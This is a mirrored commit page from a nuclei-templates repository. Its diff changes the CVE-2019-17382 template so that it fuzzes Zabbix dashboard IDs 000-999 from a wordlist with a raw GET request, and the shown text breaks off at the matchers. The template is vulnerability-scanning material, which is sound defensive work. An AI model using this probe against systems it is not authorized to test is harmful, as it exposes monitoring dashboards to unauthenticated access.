daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2019-17382.yaml 

Sometimes dashboards get deleted and asking just for an specific numbre will give a false negative
patch-1
Open Sec 2021-04-23 16:15:16 -05:00 committed by GitHub
parent 865b3193a6
commit d6c0dfa5c5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
cves/2019/CVE-2019-17382.yaml
View File

@ -9,9 +9,20 @@ info:
tags: cve,cve2019,zabbix
requests:
- method: GET
path:
- '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'
requests:
- payloads:
id: /usr/share/wordlists/seclists/Fuzzing/3-digits-000-999.txt
attack: sniper
raw:
- |
GET zabbix.php?action=dashboard.view&dashboardid={{id}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
Accept-Language: en-US,en;q=0.9
Connection: close
matchers-condition: and
matchers: